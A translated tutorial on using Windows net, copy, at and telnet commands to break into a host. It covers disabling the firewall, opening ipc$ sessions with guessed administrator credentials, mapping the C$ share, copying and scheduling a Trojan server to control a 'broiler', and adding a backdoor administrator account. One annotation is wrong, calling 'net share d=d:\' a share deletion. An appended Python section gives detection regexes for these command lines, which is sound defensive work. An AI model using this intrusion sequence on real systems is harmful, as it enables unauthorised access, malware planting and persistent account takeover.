Windows DOS attack: some commands explained (1)

  

Some commonly used net commands, with examples. I take the IP address 192.168.1.1 as the example. Typically, when we can connect but cannot perform other operations, the firewall can be turned off with:

net stop sharedaccess

1. Establish an ipc$ connection or map directly

net use \\ip\ipc$ password /user:username

net use \\ip\abc username:admin$123

For example:

net use \\192.168.1.1\ipc$ 123456 /user:administrator

This command establishes an ipc$ null connection with the host 192.168.1.1, with the username administrator and the password 123456.

2. Delete the ipc$ null connection

net use \\ip /del

For example:

net use \\192.168.1.1 /del

This deletes the ipc$ connection established with host 192.168.1.1.

3. Start and stop services:

net start \\ View the services that are already started

net start servername

net stop servername

Such as:

net start telnet \\ Start the telnet service

net stop telnet \\ Stop the telnet service

4. Enable and disable shares

net share ipc$ \\ Open the ipc$ default share

net share ipc$ /del \\ Close the ipc$ default share

net share c=c:\ \\ Fully share the C drive

net share d=d:\ \\ Delete the fully shared D drive

net share e$=e:\ \\ Create a hidden share of the E drive

5. Map a hard disk

net use z: \\ip\c$

For example:

net use z: \\192.168.1.1\c$ \\ Map the C drive of 192.168.1.1 as the Z drive of the local machine

Description: After the mapping succeeds, a hard disk Z appears in My Computer. In fact, Z is the C drive of 192.168.1.1!

net use z: /del \\ Disconnect the mapping

Role in an intrusion: after mapping the other party's hard disk, we can copy files directly to it.

Condition for success: an ipc$ connection must be established with the other party.

6. Copy a file remotely: copy

copy e:\3389.exe \\192.168.1.1\c$ \\ Copy the 3389.exe file on the local E drive to the root directory of the C drive of the other system, 192.168.1.1

Role of copy in an intrusion: copy a local file to the other party's hard disk.

Condition required for copying: an ipc$ connection must be established with the host.

7. View the remote system time

net time \\ip

net time \\192.168.1.1 \\ View the local time of the remote host 192.168.1.1

Function: get the other party's time, in preparation for the Trojan's scheduled task.

8. Run a program remotely

at \\ip time server.exe

at \\192.168.1.1 12:30 c:\server.exe \\ Have the host run, at 12:30 noon, the Trojan server.exe that we copied to the root directory of the C drive

Role in an intrusion: this lets us connect to the Trojan server with our Trojan client and control the compromised machine (the "broiler") through a graphical interface.

9. Add an administrator account:

net user ylinuxs 123456 /add \\ Add a user named ylinuxs with the password 123456

net localgroup administrators ylinuxs /add \\ Promote ylinuxs to administrator, that is, add it to the administrators group

Note: On some systems the administrator group is not named administrators, so adjust to the actual situation. On 99.9% of systems, however, the administrator group is still administrators.

Modify a user's password:

net user ylinuxs 123 \\ Change the password of user ylinuxs to 123

10. Log in to a remote host: telnet

telnet ip port

For example: telnet 192.168.1.1 135 \\ Connect to port 135 of 192.168.1.1
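
Seen from the defending side, each command above leaves a process command line that can be matched in process-creation logs. The following Python example is added here and is not part of the original page: it flags the command lines from steps 1 to 9 and reports hosts where a new user is created and then added to the administrators group. The rule names, host names and sample events are assumptions constructed for illustration.

```python
import re

# Patterns for the cmd.exe command lines described on this page.
# Rule names are labels invented for this example.
RULES = [
    ("firewall_stop", r"\bnet1?\s+stop\s+sharedaccess\b"),
    ("admin_share_use", r"\bnet1?\s+use\s+(?:[a-z]:\s+)?\\\\[^\\\s]+\\(?:ipc|admin|[a-z])\$"),
    ("share_created", r"\bnet1?\s+share\s+\S+=[a-z]:\\"),
    ("copy_to_admin_share", r"\bcopy\s+\S+\s+\\\\[^\\\s]+\\(?:admin|[a-z])\$"),
    ("remote_at_job", r"\bat\s+\\\\\S+\s+\d{1,2}:\d{2}\s+\S+"),
    ("user_added", r"\bnet1?\s+user\s+\S+\s+\S+\s+/add\b"),
    ("admin_group_add", r"\bnet1?\s+localgroup\s+administrators\s+\S+\s+/add\b"),
]
COMPILED = [(name, re.compile(rx, re.IGNORECASE)) for name, rx in RULES]

def classify(command_line):
    """Return the names of all rules matching one process command line."""
    return [name for name, rx in COMPILED if rx.search(command_line)]

def scan(events):
    """events: iterable of (host, command_line). Returns {host: [rule, ...]} in log order."""
    hits = {}
    for host, cmd in events:
        for name in classify(cmd):
            hits.setdefault(host, []).append(name)
    return hits

def account_takeover_hosts(hits):
    """Hosts where a user was created and later added to the administrators group."""
    return [host for host, names in hits.items()
            if "user_added" in names
            and "admin_group_add" in names[names.index("user_added"):]]

# Constructed sample events (host, command line); not taken from a real log.
SAMPLE = [
    ("WS01", r"net use \\192.168.1.1\ipc$ 123456 /user:administrator"),
    ("WS01", r"net use z: \\192.168.1.1\c$"),
    ("WS01", r"copy e:\3389.exe \\192.168.1.1\c$"),
    ("WS01", r"at \\192.168.1.1 12:30 c:\server.exe"),
    ("SRV02", r"net user ylinuxs 123456 /add"),
    ("SRV02", r"net localgroup administrators ylinuxs /add"),
    ("SRV03", r"net use z: /del"),      # benign: disconnecting a mapping
    ("SRV03", r"net start telnet"),     # not covered by these rules
]

if __name__ == "__main__":
    for host, names in scan(SAMPLE).items():
        print(host, names)
```

In practice the (host, command line) pairs would come from process-creation auditing with command-line logging enabled; password-change commands such as step 9's last line need a separate rule.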
